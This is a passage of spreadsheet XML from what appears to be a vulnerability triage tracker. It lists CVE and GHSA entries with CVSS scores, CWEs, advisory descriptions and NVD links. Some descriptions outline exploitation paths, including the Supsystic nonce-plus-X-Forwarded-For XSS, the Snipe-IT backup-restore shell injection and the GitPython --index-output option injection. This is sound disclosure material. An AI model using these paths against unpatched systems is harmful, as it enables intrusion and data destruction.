      <c r="N1217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1217" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1217" s="5" t="inlineStr"/>
      <c r="Q1217" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1217" s="5" t="inlineStr">
        <is>
          <t>Server-Side Request Forgery (SSRF) vulnerability in John Darrel Hide My WP Ghost allows Server Side Request Forgery.
This issue affects Hide My WP Ghost: from n/a through 7.0.09.</t>
        </is>
      </c>
      <c r="S1217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81806</t>
        </is>
      </c>
    </row>
    <row r="1218">
      <c r="A1218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82061</t>
        </is>
      </c>
      <c r="D1218" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1218" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1218" s="5" t="inlineStr"/>
      <c r="H1218" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1218" s="5" t="inlineStr"/>
      <c r="J1218" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1218" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1218" s="5" t="inlineStr"/>
      <c r="M1218" s="5" t="inlineStr"/>
      <c r="N1218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1218" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1218" s="5" t="inlineStr"/>
      <c r="Q1218" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1218"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S1218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t>
        </is>
      </c>
    </row>
    <row r="1219">
      <c r="A1219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82071</t>
        </is>
      </c>
      <c r="D1219" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1219" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1219" s="5" t="inlineStr"/>
      <c r="H1219" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1219" s="5" t="inlineStr"/>
      <c r="J1219" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1219" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1219" s="5" t="inlineStr"/>
      <c r="M1219" s="5" t="inlineStr"/>
      <c r="N1219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1219" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1219" s="5" t="inlineStr"/>
      <c r="Q1219" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R1219"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S1219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t>
        </is>
      </c>
    </row>
    <row r="1220">
      <c r="A1220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1220" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83595</t>
        </is>
      </c>
      <c r="D1220" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1220" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1220" s="5" t="inlineStr"/>
      <c r="H1220" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1220" s="5" t="inlineStr"/>
      <c r="J1220" s="5" t="inlineStr"/>
      <c r="K1220" s="5" t="inlineStr"/>
      <c r="L1220" s="5" t="inlineStr"/>
      <c r="M1220" s="5" t="inlineStr"/>
      <c r="N1220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1220" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P1220" s="5" t="inlineStr"/>
      <c r="Q1220" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R1220" s="5" t="inlineStr">
        <is>
          <t>AVideo contains a cross-site request forgery vulnerability in plugin/API/set.json.php that allows attackers to perform state-changing actions by crafting GET requests that bypass CSRF protection. Attackers can navigate a victim's browser to a malicious URL with API parameters to delete videos, deactivate accounts, or modify playlists without user interaction.</t>
        </is>
      </c>
      <c r="S1220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83595</t>
        </is>
      </c>
    </row>
    <row r="1221">
      <c r="A1221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1221" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83625</t>
        </is>
      </c>
      <c r="D1221" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1221" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1221" s="5" t="inlineStr"/>
      <c r="H1221" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1221" s="5" t="inlineStr"/>
      <c r="J1221" s="5" t="inlineStr"/>
      <c r="K1221" s="5" t="inlineStr"/>
      <c r="L1221" s="5" t="inlineStr"/>
      <c r="M1221" s="5" t="inlineStr"/>
      <c r="N1221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1221" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1221" s="5" t="inlineStr"/>
      <c r="Q1221" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1221" s="5" t="inlineStr">
        <is>
          <t>The Contact Form by Supsystic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via IP Address Header in all versions up to, and including, 1.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. An unauthenticated attacker can first call the 'updateNonce' action — which is accessible without authentication due to its absence from the plugin's permission list — to obtain a valid nonce, then submit a contact form with a malicious payload in a spoofed IP header such as X-Forwarded-For.</t>
        </is>
      </c>
      <c r="S1221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83625</t>
        </is>
      </c>
    </row>
    <row r="1222">
      <c r="A1222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84387</t>
        </is>
      </c>
      <c r="D1222" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1222" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G1222" s="5" t="inlineStr"/>
      <c r="H1222" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I1222" s="5" t="inlineStr"/>
      <c r="J1222" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K1222" s="5" t="inlineStr"/>
      <c r="L1222" s="5" t="inlineStr"/>
      <c r="M1222" s="5" t="inlineStr"/>
      <c r="N1222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1222" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1222" s="5" t="inlineStr"/>
      <c r="Q1222" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R1222"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S1222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84387</t>
        </is>
      </c>
    </row>
    <row r="1223">
      <c r="A1223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86733</t>
        </is>
      </c>
      <c r="D1223" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1223" s="5" t="inlineStr"/>
      <c r="H1223" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1223" s="5" t="inlineStr"/>
      <c r="J1223" s="5" t="inlineStr"/>
      <c r="K1223" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1223" s="5" t="inlineStr"/>
      <c r="M1223" s="5" t="inlineStr"/>
      <c r="N1223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1223" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1223" s="5" t="inlineStr"/>
      <c r="Q1223" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R1223" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 streams the SQL entry from an uploaded backup archive directly into the MySQL/MariaDB command-line client (`mysql`) without the --binary-mode flag, so the client interprets lines beginning with backslash commands such as `\!` as local shell commands. An authenticated superadministrator who uploads a crafted ZIP backup (POST /admin/backups/upload) and triggers a restore (POST /admin/backups/restore/{filename}) without the optional `clean` sanitizer parameter — which is not applied by default because DB_SANITIZE_BY_DEFAULT is false — can execute arbitrary OS commands as the web application's operating-system user, exposing application secrets (including database credentials and APP_KEY) and allowing modification of application-writable files and data. Version 8.7.0 adds the --binary-mode flag to the client invocation.</t>
        </is>
      </c>
      <c r="S1223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86733</t>
        </is>
      </c>
    </row>
    <row r="1224">
      <c r="A1224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1224" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1224" s="5" t="inlineStr">
        <is>
          <t>GHSA-7jx3-jqcp-hhgc</t>
        </is>
      </c>
      <c r="D1224" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E1224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1224" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1224" s="5" t="inlineStr"/>
      <c r="H1224" s="5" t="inlineStr"/>
      <c r="I1224" s="5" t="inlineStr"/>
      <c r="J1224" s="5" t="inlineStr"/>
      <c r="K1224" s="5" t="inlineStr"/>
      <c r="L1224" s="5" t="inlineStr">
        <is>
          <t>pip:gitpython</t>
        </is>
      </c>
      <c r="M1224" s="5" t="inlineStr"/>
      <c r="N1224" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1224" s="5" t="inlineStr"/>
      <c r="P1224" s="5" t="inlineStr"/>
      <c r="Q1224" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R1224" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-4gmw-gg2m-w46p. This link is maintained to preserve external references.
## Original Description
GitPython versions before 3.1.58 contain an arbitrary file overwrite vulnerability in IndexFile.from_tree, IndexFile.reset, and IndexFile.merge_tree methods that append caller-influenced treeish strings to git read-tree without option validation or argument separation. Attackers can inject the --index-output option to overwrite arbitrary files with a valid git-index blob, destroying existing file content at attacker-controlled writable paths.</t>
        </is>
      </c>
      <c r="S1224" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-7jx3-jqcp-hhgc</t>
        </is>
      </c>
    </row>
    <row r="1225">
      <c r="A1225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1225" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1225" s="5" t="inlineStr">
        <is>
          <t>CVE-2020-37277</t>
        </is>
      </c>
      <c r="D1225" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1225" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1225" s="5" t="inlineStr"/>
      <c r="H1225" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1225" s="5" t="inlineStr"/>
      <c r="J1225" s="5" t="inlineStr"/>
      <c r="K1225" s="5" t="inlineStr"/>
      <c r="L1225" s="5" t="inlineStr"/>
      <c r="M1225" s="5" t="inlineStr"/>
      <c r="N1225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1225" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P1225" s="5" t="inlineStr"/>
      <c r="Q1225" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R1225" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 3.15.4 contain a denial of service vulnerability in the InventoryTransaction component's findResultItem() method. Malicious clients can send specially crafted InventoryTransactionPackets with multiple conflicting pathways to cause exponential processing complexity, freezing the server.</t>
        </is>
      </c>
      <c r="S1225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2020-37277</t>
        </is>
      </c>
    </row>
    <row r="1226">
      <c r="A1226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1226" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1226" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-35499</t>
        </is>
      </c>
      <c r="D1226" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1226" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1226" s="5" t="inlineStr"/>
      <c r="H1226" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1226" s="5" t="inlineStr"/>
      <c r="J1226" s="5" t="inlineStr"/>
      <c r="K1226" s="5" t="inlineStr"/>
      <c r="L1226" s="5" t="inlineStr"/>
      <c r="M1226" s="5" t="inlineStr"/>
      <c r="N1226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1226" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1226" s="5" t="inlineStr"/>
      <c r="Q1226" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1226" s="5" t="inlineStr">
        <is>
          <t>In Trimble TM4WEB 21.4.0.4, the external bill viewer endpoint is vulnerable to reflected cross-site scripting via injection in a arbitrary parameter appended to the URL.</t>
        </is>
      </c>
      <c r="S1226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-35499</t>
        </is>
      </c>
    </row>
    <row r="1227">
      <c r="A1227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1227" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1227" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-29419</t>
        </is>
      </c>
      <c r="D1227" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1227" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1227" s="5" t="inlineStr"/>
      <c r="H1227" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1227" s="5" t="inlineStr"/>
      <c r="J1227" s="5" t="inlineStr"/>
      <c r="K1227" s="5" t="inlineStr"/>
      <c r="L1227" s="5" t="inlineStr"/>
      <c r="M1227" s="5" t="inlineStr"/>
      <c r="N1227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1227" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P1227" s="5" t="inlineStr"/>
      <c r="Q1227" s="5" t="inlineStr">
        <is>
          <t>CWE-300</t>
        </is>
      </c>
      <c r="R1227" s="5" t="inlineStr">
        <is>
          <t>CTFd v3.7.6 was discovered to be vulnerable to a man-in-the-middle attack.</t>
        </is>
      </c>
      <c r="S1227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-29419</t>
        </is>
      </c>
    </row>
    <row r="1228">
      <c r="A1228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11573</t>
        </is>
      </c>
      <c r="D1228" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1228" s="5" t="inlineStr">
        <is>
          <t>a59d8014-47c4-4630-ab43-e1b13cbe58e3</t>
        </is>
      </c>
      <c r="G1228" s="5" t="inlineStr"/>
      <c r="H1228" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1228" s="5" t="inlineStr"/>
      <c r="J1228" s="5" t="inlineStr"/>
      <c r="K1228" s="5" t="inlineStr"/>
      <c r="L1228" s="5" t="inlineStr"/>
      <c r="M1228" s="5" t="inlineStr"/>
      <c r="N1228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1228" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1228" s="5" t="inlineStr"/>
      <c r="Q1228" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R1228" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled recursion (CWE-674) in the QDomDocument/QDomNode serialization path of the Qt XML module (QtXml, qtbase). QDomElementPrivate::save() and QDomNodePrivate::save() recurse mutually, consuming one stack frame per level of element nesting with no depth limit, no configurable bound and no error return. A document with deeply nested elements parses successfully but exhausts the call stack and terminates the process when serialized. Reachable via QDomDocument::toByteArray() (Qt 4.0 and later), QDomDocument::toString(), QDomDocument::toCString(), QDomNode::save(), and operator&lt;&lt;(QTextStream&amp;, const QDomNode&amp;). Denial of service only — no code execution and no memory disclosure.</t>
        </is>
      </c>
      <c r="S1228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11573</t>
        </is>
      </c>
    </row>
    <row r="1229">
      <c r="A1229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1229" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16281</t>
        </is>
      </c>
      <c r="D1229" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1229" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1229" s="5" t="inlineStr"/>
      <c r="H1229" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1229" s="5" t="inlineStr"/>
      <c r="J1229" s="5" t="inlineStr"/>
      <c r="K1229" s="5" t="inlineStr"/>
      <c r="L1229" s="5" t="inlineStr"/>
      <c r="M1229" s="5" t="inlineStr"/>
      <c r="N1229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1229" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1229" s="5" t="inlineStr"/>
      <c r="Q1229" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1229" s="5" t="inlineStr">
        <is>
          <t>The Classified Listing  WordPress plugin before 6.1.1 does not verify that the caller owns or can edit the target listing before its AI image-editing AJAX action deletes or attaches media, allowing any authenticated user, including a subscriber, to permanently delete attachments from, and attach files to, any listing owned by another user.</t>
        </is>
      </c>
      <c r="S1229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16281</t>
        </is>
      </c>
    </row>
    <row r="1230">
      <c r="A1230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16769</t>
        </is>
      </c>
      <c r="D1230" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1230" s="5" t="inlineStr">
        <is>
          <t>product-security@silabs.com</t>
        </is>
      </c>
      <c r="G1230" s="5" t="inlineStr"/>
      <c r="H1230" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1230" s="5" t="inlineStr"/>
      <c r="J1230" s="5" t="inlineStr"/>
      <c r="K1230" s="5" t="inlineStr"/>
      <c r="L1230" s="5" t="inlineStr"/>
      <c r="M1230" s="5" t="inlineStr"/>
      <c r="N1230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1230" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1230" s="5" t="inlineStr"/>
      <c r="Q1230" s="5" t="inlineStr">
        <is>
          <t>CWE-440</t>
        </is>
      </c>
      <c r="R1230" s="5" t="inlineStr">
        <is>
          <t>An unencrypted 'pause encryption request' message causes a denial of service in the in the RS9116W/SiWx917. See vulnerability B-E10 in the related paper below.</t>
        </is>
      </c>
      <c r="S1230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16769</t>
        </is>
      </c>
    </row>
    <row r="1231">
      <c r="A1231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1231" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19051</t>
        </is>
      </c>
      <c r="D1231" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1231" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G1231" s="5" t="inlineStr"/>
      <c r="H1231" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1231" s="5" t="inlineStr"/>
      <c r="J1231" s="5" t="inlineStr"/>
      <c r="K1231" s="5" t="inlineStr"/>
      <c r="L1231" s="5" t="inlineStr"/>
      <c r="M1231" s="5" t="inlineStr"/>
      <c r="N1231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1231" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1231" s="5" t="inlineStr"/>
      <c r="Q1231" s="5" t="inlineStr">
        <is>
          <t>CWE-256</t>
        </is>
      </c>
      <c r="R1231" s="5" t="inlineStr">
        <is>
          <t>Plaintext storage of a password vulnerability in Menulux Software Inc. Menulux Portal allows Retrieve Embedded Sensitive Data.
This issue affects Menulux Portal: before 20260903211448.</t>
        </is>
      </c>
      <c r="S1231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19051</t>
        </is>
      </c>
    </row>
    <row r="1232">
      <c r="A1232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20293</t>
        </is>
      </c>
      <c r="D1232" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1232" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G1232" s="5" t="inlineStr"/>
      <c r="H1232" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1232" s="5" t="inlineStr"/>
      <c r="J1232" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1232" s="5" t="inlineStr"/>
      <c r="L1232" s="5" t="inlineStr"/>
      <c r="M1232" s="5" t="inlineStr"/>
      <c r="N1232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1232" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1232" s="5" t="inlineStr"/>
      <c r="Q1232" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="R1232"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S1232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t>
        </is>
      </c>
    </row>
    <row r="1233">
      <c r="A1233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1233" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52762</t>
        </is>
      </c>
      <c r="D1233" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1233" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1233" s="5" t="inlineStr"/>
      <c r="H1233" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1233" s="5" t="inlineStr"/>
      <c r="J1233" s="5" t="inlineStr"/>
      <c r="K1233" s="5" t="inlineStr"/>
      <c r="L1233" s="5" t="inlineStr"/>
      <c r="M1233" s="5" t="inlineStr"/>
      <c r="N1233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1233" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1233" s="5" t="inlineStr"/>
      <c r="Q1233" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R1233" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, YesWiki Bazar contains a stored Server-Side Template Injection (SSTI) vulnerability in the semantic template feature that can be escalated to confirmed Remote Code Execution (RCE). An authenticated administrator can place arbitrary Twig expressions into the Semantic template (Twig) field (bn_sem_template), and that content is later executed server-side when public semantic endpoints are requested. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="S1233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52762</t>
        </is>
      </c>
    </row>
    <row r="1234">
      <c r="A1234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1234" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53603</t>
        </is>
      </c>
      <c r="D1234" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1234" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1234" s="5" t="inlineStr"/>
      <c r="H1234" s="5" t="n">
        <v>0.002</v>
      </c>
